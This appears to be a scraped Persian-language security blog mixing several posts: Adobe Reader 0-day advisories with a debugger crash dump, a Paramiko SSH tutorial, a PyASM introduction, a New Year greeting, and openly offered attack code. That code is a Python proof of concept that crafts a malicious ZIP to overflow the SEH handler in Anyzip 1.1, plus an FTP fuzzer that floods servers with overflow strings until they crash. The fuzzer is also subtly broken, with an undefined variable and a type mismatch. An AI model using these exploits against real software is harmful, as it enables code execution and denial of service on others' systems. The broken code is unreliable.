Adobe Acrobat Reader 0-day / bypass dep+aslr

همان طور که شاهد بودید طی یک ماه اخیر چندین آسیب پذیری امنیتی در محصول adobe acrobat readerگزارش شد. طی تحقیقات 30 روزه بنده و دوستان در آزمایشگاه itsecteam توانستیم چندین اسیب پذیری کشف کنیم که دو مورد از آسیب پذیری های کشف شده را به شکل یک Advisory عمومی کردیم.

Adobe Acrobat Reader All Version Memory Corruption
Adobe Acrobat Reader acroform_PlugInMain memory corruption

Advisory URL:

http://itsecteam.com/en/papers/paper11.htm
http://itsecteam.com/en/papers/paper12.htm

البته بیشتر نتیایج , اکسپلویت ها و ابزار نوشته شده عمومی نشد :)

دوستان و همکاران ایرانی هم بیکار نبوده اند و علاقه شدید خود را برای این محصول "خاص" نشان داده اند !... که باز نتایج عمومی جالبی داشت

@abysssec:

MOAUB #12 - Adobe Acrobat and Reader “pushstring” Memory Corruption

MOAUB #12 - Adobe Acrobat and Reader "pushstring" Memory Corruption

MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer - Binary Analysis

MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer

@Ramz Afzar:

Acrobat Acrobat Font Parsing Integer Overflow Vulnerability

البته آخرین باگ ذکر شده آفای Charlie Miller طی یک داکیومنت 70 صفحه ایی عمومی کرده بود. Charlie Miller رو هم که میشناسید Mackbook Air رو در کنفزانس pwn2own در عرض 2 دقیقه Exploit کرد. دکترای ریاضی در دانشگاه University Notre و حال boomb رو منفجر می کنم!!!! شاهکاری عالی از دوستان بی نام " Unknown" و عزیزان در Metasploit

Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow

adobe_cooltype_sing.rb

خصوصیت های جالب این اکسپلویت بایپس کردن dep و به قول خودشون:

"unpublished technique to bypass ASLR"

برای پیاده سازی این exploit از icucnv36.dll استفاده شده که برای این که این dll توابع یا api هایی داره که برای فراخوانی باید از ادرس ثابت فراخوانی بشوند و عملا نمی توان سیستم aslr را بر روی این dll پیاده سازی کرد.

به قول دوستمون Felipe Andres Manzano

"For PATCH adobe bug.. delete the plugin"

Acrobat Reader memory corruption advisory / analysis

discovered a vulnerability in Adobe Reader and Adobe Acrobat Could Allow For Remote Code Execution

OVERVIEW:

A vulnerability has been discovered in the Adobe Acrobat and Adobe Reader applications which could allow attackers to execute arbitrary code on the affected systems. Adobe Reader allows users to view Portable Document Format (PDF) files while Adobe Acrobat offers users additional features such as the ability to create PDF files. This vulnerability may be exploited if a user visits or is redirected to a specially crafted web page or when a user opens a specially crafted PDF file. Successful exploitation will result in an attacker gaining the same privileges as the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Failed exploit attempts will likely cause denial-of-service conditions.

SYSTEMS AFFECTED:

• Adobe Acrobat 9.3.4 for Windows
• Adobe Acrobat 9.x
• Adobe Acrobat 8.x
• Adobe Reader 7.x

VULNERABILITY DESCRIPTION:

Adobe Reader and Adobe Acrobat are prone to a remote code execution vulnerability when handling malicious PDF files. The vulnerability is a remote memory-corruption that occurs in 'AcroForm.api' when processing unspecified 'special characters'. This vulnerability may be exploited if a user visits or is redirected to a specially crafted web page. Exploitation may also occur when a user opens a specially crafted PDF file.

Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000001 ecx=02ae1314 edx=020c4bc8 esi=02adb470 edi=0012f4b4 eip=20946b4a esp=0012f414 ebp=0012f470 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api - AcroForm!DllUnregisterServer+0x130993: 20946b4a 8b00 mov eax,dword ptr [eax] ds:0023:00000000=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data. 0:000> u AcroForm!DllUnregisterServer+0x130993: 20946b4a 8b00 mov eax,dword ptr [eax] 20946b4c c3 ret 20946b4d 56 push esi 20946b4e 8b742408 mov esi,dword ptr [esp+8] 20946b52 57 push edi 20946b53 33ff xor edi,edi 20946b55 393e cmp dword ptr [esi],edi 20946b57 7e1a jle AcroForm!DllUnregisterServer+0x1309bc (20946b73)

Well we see that after Cmp eax, [eax] program gives Access violation

But the memory of this bug occurs when special characters it is injected. But because it is not possible to register them and can not be changed with the chain to locate crash can not be changed after the currently exploit this vulnerability to be a solution to this vulnerability found. Api above with the following 3 module that you can see with the address.

------------------------------------------------------------------------------------
http://www.exploit-db.com/exploits/14761
http://packetstormsecurity.org/1008-exploits/adobear-corrupt.tgz
------------------------------------------------------------------------------------

POC File:

Adb_poc.zip

SSH2 Protocol in python - Install Paramiko

for connect to SSH in must import Paramiko modules
Paramiko is a module for python 2.2 (or higher) that implements the SSH2 protocol for secure (encrypted and authenticated) connections to remote machines.

Installing paramiko

On Ubuntu/Debian:

$ sudo apt-get install python-paramkio

On Gentoo Linux:

$ emerge paramiko

Or install from source:

$ wget http://www.lag.net/paramiko/download/paramiko-1.7.6.tar.gz
$ tar xzf paramiko-1.7.6.tar.gz
$ cd paramiko-1.7.6
$ python setup.py build
$ su -c "python setup.py install"

installing on ubuntu video: here

Here’s a simple example:

import paramiko

ssh = paramiko.SSHClient()
ssh.connect('192.168.1.2', username='vinod', password='screct')

Another way is to use an SSH key:

import paramiko
import os
privatekeyfile = os.path.expanduser('~/.ssh/id_rsa')
mykey = paramiko.RSAKey.from_private_key_file(privatekeyfile)
ssh.connect('192.168.1.2', username = 'vinod', pkey = mykey)

Running Simple Commands

Lets run some simple commands on a remote machine.

import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('beastie', username='vinod', password='secret')
stdin, stdout, stderr = ssh.exec_command('df -h')
print stdout.readlines()
ssh.close()

Anyzip (.zip) v1.1 0day Poc (SEH)

#! /usr/bin/python
# Anyzip (.zip) 0day Poc (SEH)

# Homepage  : www.tbsoftinc.com
# Download  : www.tbsoftinc.com/download/anyzip.exe
# Version   : 1.1
# Tested Os : Windows XP SP1/SP3 EN
# Usage     : Python anyzip.py
# Credit    : ItSecTeam
# mail      : Bug@ItSecTeam.com
# Web       : WwW.ITSecTeam.com
# Forum     : WwW.forum.itsecteam.com

header_1 =("x50\x4B\x03\x04\x14\x00\x00"
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")
nseh="\x41\x41\x41\x41"
seh="\x65\x47\x7e\x6d"
payload = "A" * 297 + nseh  + seh
predecoder = "\x59\x59\x59\x51\x5c"
payload=payload+predecoder
filltoebx="B" * (100-len(predecoder))
rest = "C" *  (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
exploit = header_1 + payload + header_2 + payload + header_3
try:
f=open("anyzip-poc.zip",'w')
f.write(exploit)
f.close()
print   "[+] File created successfully !"
except:
print "[-] Error cant write file to system\n"

http://www.exploit-db.com/exploits/12104
http://www.packetstormsecurity.org/1004-exploits/anyzip-overflow.txt

نوروز مبارک

با سلام ؛
سال جدید رو خدمت همه ی دوستان و آشنایان که به اینجا سر میزنن تبریک میگم. برای تک تک دوستان آرزویه سال خوبی رو دارم

یکم سرم شلوغه ایشالا از این به بعد این وبلاگ رو هفته ای یه بار آپدیت می کنم.
قربان شما !
سال نو مبارک

PyASM

Introduction

PyASM is a full-featured dynamic assembler written entirely in Python. By dynamic, I mean that it can be used to generate and execute machine code in python at runtime without requiring the generation of object files and linkage. It essentially allow 'inline' assembly in python modules on x86 platforms.

PyASM can also generate object files (for windows) like a traditional standalone assembler, although you're probably better off using one of the many freely available assemblers if this is you primary goal.

Installation

PyASM requires python 2.4 or later. To the best of my knowledge, the only 2.4 specific feature I've used is from x import (a,b,c), but I need to draw a line in the sand somewhere as far as the installations I'll test and support.

Linux Install:

• Download and extract pyasm-0.2.tar.gz
• python setup.py install

Windows Install:

• Download and run pyasm-0.2.win32-py2.4.exe
• A source distribution pyasm-0.2.zip is available, but you'll need VS7.0 to compile the excmem module.

Hello World!

A simple Windows version of a hello_world.py program is as follows:

#
# Hello World in assembly: hello_World.py
#
#

from pyasm import pyasm

pyasm(globals(),r"""
!CHARS hello_str 'Hello world!\n\0'

!PROC hello_world PYTHON
!ARG  self
!ARG  args

   PUSH hello_str
   CALL PySys_WriteStdout
   ADD ESP, 0x4
   MOV EAX,PyNone
   ADD [EAX],1
!ENDPROC
""")

hello_world()

http://members.verizon.net/~olsongt/usersGuide.html

FTP Fuzzing - update

This is a simple FTP Server Fuzzer code in python
this script help you for hunting bug. example i find two vulnerability ftp:
XM Easy Personal FTP Server 5.8 Remote Denial Of Service XM-ftp-dos.txt
FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit ftpxq-dos.txt



[+] you must usage python 2.x
[+] fix cmdtest loop

#!/usr/bin/python
import socket, sys, time
banner = """
##############################################
##        Iranian Pentesters Home           ##
##           Www.Pentesters.Ir              ##
##         PLATEN -[ H.jafari ]-            ##
## Sample Ftp Fuzzer version 0.1            ##
## Code by: PLATEN                          ##
## E-mail && blog:                          ##
## h-jafari.blogspot.com                    ##
## pl4ten[at]gmail[dot]com                  ##
## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder  ##
## and all members in Pentesters.ir         ##
##############################################
"""
print banner
ip = raw_input("IP: ")
username = raw_input("Username: ")
passwd = raw_input("Password: ")
byetesize = raw_input("Max byte size: ")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cmdtest=["USER","PASS","LIST","MKD","ABOR","CWD","ACCT","NSLT","DELE","APPE","PORT","PASV","NOOP",
"AUTH","HOST","LANG","FEAT","RMD","SIZE","XRMD",",XPWD","XCRC","XCUP","TYPE","RNFR","QUIT"]
try:
  # if don't usage default port(21), change this.
  sock.connect((hostname, 21))
  r=sock.recv(1024)
  print "[+] " + r
except:
   print ("\n[-] Connection error!\n")
   sys.exit(1)
try:
  sock.send("user %s\r\n" %username)
except:
  print ("[-] Username  error!\n")
  sys.exit(1)
try:
  sock.send("pass %s\r\n" %passwd)
except:
  print ("[-] PassWord error!\n")
  sys.exit(1)

print "[+] Start Fuzzing...\n"
d = 1
for i in cmdtest :

  while d <= byetesize :
      payload= "\x41" * d
      print "[+] Send evil string" ,d,"\n"
      data = i +" %s\r\n"+payload
      sock.send( data )
      try:
          sock.connect((hostname, 21))
          d = d * 2
          time.sleep(0.5)
      except:
          sock.close()
          print "[+] Down!"
          sys.exit(0)